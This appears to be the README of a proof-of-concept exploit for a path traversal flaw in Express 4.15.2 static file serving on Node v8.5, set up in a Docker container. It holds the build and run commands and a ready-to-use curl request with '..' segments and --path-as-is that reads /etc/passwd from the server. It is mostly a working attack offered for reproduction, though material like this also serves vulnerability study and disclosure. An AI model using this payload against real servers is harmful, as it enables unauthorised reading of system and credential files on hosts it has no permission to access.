This proof of concept lets anyone who can GET a static file from an Express server (express 4.15.2 on Node v8.5) read any file on the host that the user running the web server can read.

Conveniently, Express ships an exploitable example in its own source tree.
- Docker
  - Build the image:

        docker build -t exploit .

  - Start the server (the static server listens on port 3000 inside the container):

        docker run -p 3000:3000 exploit

  - Request a traversing path. The --path-as-is flag stops curl from collapsing the `..` segments client-side, so the server receives the path exactly as written; a vulnerable server answers with the container's /etc/passwd:

        curl --path-as-is 127.0.0.1:3000/../../../pivot/../../../../etc/passwd